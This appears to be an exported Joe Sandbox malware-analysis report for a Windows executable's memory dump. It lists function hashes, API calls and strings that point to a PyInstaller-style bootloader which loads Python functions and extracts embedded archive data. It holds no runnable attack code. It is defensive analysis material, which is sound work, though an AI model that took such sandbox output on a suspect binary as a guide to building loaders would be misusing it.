Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84378e74e3abe4b2e50357a3cae6d1c9f133da408f6cd3af500eca0aac5fc0e9
Instruction ID: 7fa24b429966cb0bc5ad64290327bbba85dadac0543d3018e06ed7f6f26e6309
Opcode Fuzzy Hash: 84378e74e3abe4b2e50357a3cae6d1c9f133da408f6cd3af500eca0aac5fc0e9
Instruction Fuzzy Hash: E681F572A08B8156E774CB19964037AB691FB87BE4F144335EA8D93B99EF3DD4408B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D346E70 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 970fa9c1e70947ae83e04df9520a0fb1810d06995f6d4a160b1c2f03216b318c
Instruction ID: ce8824e41aaf8f795c59c789e4444162855e3b9ef8a882f8f65dc2a18fc396bf
Opcode Fuzzy Hash: 970fa9c1e70947ae83e04df9520a0fb1810d06995f6d4a160b1c2f03216b318c
Instruction Fuzzy Hash: 2861E573E19A8286FB69CA2884507BDE681AF42F70F140639E65DC76C4FF6FE840D640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D331F94 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
Instruction ID: 5c8cdc39ad571ba73e9673f322d9e669885d23a1198031ad9313dab3f4f2acf3
Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
Instruction Fuzzy Hash: 26519B3AA14E5196E724CB29C28033973A1EB56F78F244231CE4D977A4EF7AE843C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D331B84 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
Instruction ID: 68839405999de22c27880e55d0a4c6f303837df3dfacde7a59494c1de5b3ec78
Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
Instruction Fuzzy Hash: 72516176A18E5196E764CB29D140238B7B0EB4AF78F244231DE4D977A4EF3AE853C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3323A4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
Instruction ID: b7262633954da2c6e92254b9aa4d7b3034998ada94f8ac49dfeca659c3ebdd45
Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
Instruction Fuzzy Hash: 4E51933AA18F5196E724CB29D190238B7A0EB56F78F245131CE4D877A4EF3AE943C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D331D90 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
Instruction ID: a4e10ea0436472cb52a15633a7de3f7b4899fef744c7810a678e6a58fc6a4d21
Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
Instruction Fuzzy Hash: 19515377A18A5196E724CB29C150338B7B1EB46F68F284231DE4D97794EF3AE853C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D331980 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
Instruction ID: c301c577b92ddd47ededfb3d2bc2154e870c7d1e642263968e34d25b0571de2a
Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
Instruction Fuzzy Hash: 10518636A18E9195E764CF29C140238B7B1EB46F69F244231DE4D977A4EF3AE853C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3321A0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
Instruction ID: d059a4540d9c6fa9a20579a5abca3c712a2e452838ab396774fa46826a3437a2
Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
Instruction Fuzzy Hash: 6251973AA18E5195E764CB29C58063C77A1EB46FB8F644131CE4C97798DF3AE853C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D336030 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: ead994e3d8b8230836818deb1f07db85b44c410f9998d15b55863dad516850cc
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: FF41D872D4DE4A1CE9A5CA1807117B8AA809F13FB0D1853B4DD9D9B3D3FD0D659AD100

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33A530 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: c7727d54e500596d2d5616afa7c36a47d45200368430125e141568a376632c0e
Instruction ID: 00b1c7523a7bd90ebc197c9f28f3b40d4c042e8ab6fd74e2e2ac6a0ee3f7e36c
Opcode Fuzzy Hash: c7727d54e500596d2d5616afa7c36a47d45200368430125e141568a376632c0e
Instruction Fuzzy Hash: 1941D372B14E5582FF58CF2ADA1416AB3A1AB49FE0B499132DE0DD7B58EF3CD5468300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D337D98 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
Instruction ID: 04b09178c32eb6e3f4aabe8a1ae20dd3666c48c142e71a218b4ef2171ae9e994
Opcode Fuzzy Hash: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
Instruction Fuzzy Hash: 0A318472B0DF4281EB65DB25654017DE6D5AB86FA0F144238EE5E93BD6EF3CD4018704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D349F40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9053913a188439c949862f5252d0d96588d6a3198c5220388b8f4d277b857ee
Instruction ID: 30c473c80fa0fcadde6668041b16fd44470bbc31599a8b095e2a738fbf56ee0d
Opcode Fuzzy Hash: d9053913a188439c949862f5252d0d96588d6a3198c5220388b8f4d277b857ee
Instruction Fuzzy Hash: 00F06871718A958ADB948F29A403629BBD0F7487D0F908139D58DC3F04DB3C91518F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32C860 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfc8547ea6af2cfbec2828df990cd3d0a6205bb3f5e3ae253026f3a9dd74dc92
Instruction ID: dc5d9c989c1263adf877f56a09a77bd56cb967da5ae3c2595f5146c20646aa19
Opcode Fuzzy Hash: cfc8547ea6af2cfbec2828df990cd3d0a6205bb3f5e3ae253026f3a9dd74dc92
Instruction Fuzzy Hash: 35A00235D0CC12D0E7489F60E850070A370FB53B24B504031D00DC10A0FF3DE545C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3251F0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D325200
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D32523A
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D32525F
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D325284
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D3252AC
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D3252D4
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D3252FC
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D325324
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D32534C
GetProcAddress.KERNEL32(?,?,00000000,00007FF61D32346E), ref: 00007FF61D325374

Strings

Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF61D325746
PyConfig_InitIsolatedConfig, xrefs: 00007FF61D325342
PyErr_Print, xrefs: 00007FF61D3254AA
PyRun_SimpleStringFlags, xrefs: 00007FF61D32572A
Py_DecRef, xrefs: 00007FF61D3251F6
PyConfig_Read, xrefs: 00007FF61D32536A
PySys_GetObject, xrefs: 00007FF61D32577A
PyStatus_Exception, xrefs: 00007FF61D325752
Failed to get address for PyStatus_Exception, xrefs: 00007FF61D32576E
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF61D3255DE
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF61D3257E6
Failed to get address for Py_ExitStatusException, xrefs: 00007FF61D325271
PyConfig_SetString, xrefs: 00007FF61D3253BA
Failed to get address for PyObject_Str, xrefs: 00007FF61D3256F6
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF61D32585E
PySys_SetObject, xrefs: 00007FF61D3257A2
PyImport_ExecCodeModule, xrefs: 00007FF61D32554A
Failed to get address for PyErr_Occurred, xrefs: 00007FF61D32549E
PyUnicode_FromFormat, xrefs: 00007FF61D325842
PyList_Append, xrefs: 00007FF61D32559A
Failed to get address for PyErr_Clear, xrefs: 00007FF61D325426
Failed to get address for PyUnicode_Decode, xrefs: 00007FF61D32580E
PyConfig_Clear, xrefs: 00007FF61D32531A
Failed to get address for PyConfig_InitIsolatedConfig, xrefs: 00007FF61D32535E
PyObject_CallFunction, xrefs: 00007FF61D32563A
PyMarshal_ReadObjectFromString, xrefs: 00007FF61D3255C2
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF61D325566
Failed to get address for PyUnicode_Join, xrefs: 00007FF61D3258AE
PyUnicode_FromString, xrefs: 00007FF61D32586A
PyConfig_SetBytesString, xrefs: 00007FF61D325392
PyErr_Restore, xrefs: 00007FF61D3254D2
PyModule_GetDict, xrefs: 00007FF61D325612
Failed to get address for PyList_Append, xrefs: 00007FF61D3255B6
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF61D325702
Failed to get address for PyUnicode_FromString, xrefs: 00007FF61D325886
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF61D325836
Failed to get address for PySys_SetObject, xrefs: 00007FF61D3257BE
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF61D3256A6
Failed to get address for Py_Finalize, xrefs: 00007FF61D325296
Py_IsInitialized, xrefs: 00007FF61D3252CA
PyConfig_SetWideStringList, xrefs: 00007FF61D3253E2
Failed to get address for PyConfig_Read, xrefs: 00007FF61D325386
PyImport_AddModule, xrefs: 00007FF61D325522
Failed to get address for PyConfig_Clear, xrefs: 00007FF61D325336
Failed to get address for PyPreConfig_InitIsolatedConfig, xrefs: 00007FF61D32571E
Failed to get address for Py_InitializeFromConfig, xrefs: 00007FF61D3252BE
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF61D32567E
PyErr_Fetch, xrefs: 00007FF61D325432
Failed to get address for PyModule_GetDict, xrefs: 00007FF61D32562E
Py_InitializeFromConfig, xrefs: 00007FF61D3252A2
PyObject_Str, xrefs: 00007FF61D3256DA
PyUnicode_DecodeFSDefault, xrefs: 00007FF61D32581A
Failed to get address for PyConfig_SetWideStringList, xrefs: 00007FF61D3253FE
PyUnicode_AsUTF8, xrefs: 00007FF61D3257CA
PyUnicode_Replace, xrefs: 00007FF61D3258BA
Failed to get address for PyErr_Restore, xrefs: 00007FF61D3254EE
Failed to get address for PyErr_Fetch, xrefs: 00007FF61D32544E
Failed to get address for PyUnicode_Replace, xrefs: 00007FF61D3258D6
PyImport_ImportModule, xrefs: 00007FF61D325572
PyErr_Occurred, xrefs: 00007FF61D325482
PyUnicode_Join, xrefs: 00007FF61D325892
Failed to get address for PyErr_Print, xrefs: 00007FF61D3254C6
Py_PreInitialize, xrefs: 00007FF61D3252F2
Failed to get address for PyConfig_SetString, xrefs: 00007FF61D3253D6
PyObject_CallFunctionObjArgs, xrefs: 00007FF61D325662
Py_ExitStatusException, xrefs: 00007FF61D325255
Failed to get address for PyImport_AddModule, xrefs: 00007FF61D32553E
PyObject_SetAttrString, xrefs: 00007FF61D3256B2
PyErr_Clear, xrefs: 00007FF61D32540A
GetProcAddress, xrefs: 00007FF61D325219
PyEval_EvalCode, xrefs: 00007FF61D3254FA
Failed to get address for PyObject_CallFunction, xrefs: 00007FF61D325656
Failed to get address for Py_DecodeLocale, xrefs: 00007FF61D32524C
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF61D325476
PyErr_NormalizeException, xrefs: 00007FF61D32545A
Failed to get address for Py_PreInitialize, xrefs: 00007FF61D32530E
Py_DecodeLocale, xrefs: 00007FF61D325230
Failed to get address for PyConfig_SetBytesString, xrefs: 00007FF61D3253AE
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF61D3256CE
Failed to get address for Py_DecRef, xrefs: 00007FF61D325212
Failed to get address for PyMem_RawFree, xrefs: 00007FF61D325606
Failed to get address for PySys_GetObject, xrefs: 00007FF61D325796
PyMem_RawFree, xrefs: 00007FF61D3255EA
Py_Finalize, xrefs: 00007FF61D32527A
Failed to get address for Py_IsInitialized, xrefs: 00007FF61D3252E6
PyUnicode_Decode, xrefs: 00007FF61D3257F2
PyObject_GetAttrString, xrefs: 00007FF61D32568A
Failed to get address for PyEval_EvalCode, xrefs: 00007FF61D325516
Failed to get address for PyImport_ImportModule, xrefs: 00007FF61D32558E

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-4266016200
Opcode ID: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
Instruction ID: a2d003d416775f3d3f386a476dd17dc019e846573c1c19e40cd1dea13f542cc9
Opcode Fuzzy Hash: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
Instruction Fuzzy Hash: 67126174E4EF0390FA59CB29A850174A3B1AF47FB9B949435C80E963A4FF7DF6488240

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3212B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61D322B30: MessageBoxW.USER32 ref: 00007FF61D322C05

_fread_nolock.LIBCMT ref: 00007FF61D321499

Strings

%s%c%s, xrefs: 00007FF61D3213EE
\, xrefs: 00007FF61D3213F5
malloc, xrefs: 00007FF61D321377
fseek, xrefs: 00007FF61D321332
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF61D3214BF
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF61D32132B
fread, xrefs: 00007FF61D3214C6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF61D3212FE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF61D321370

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Message_fread_nolock
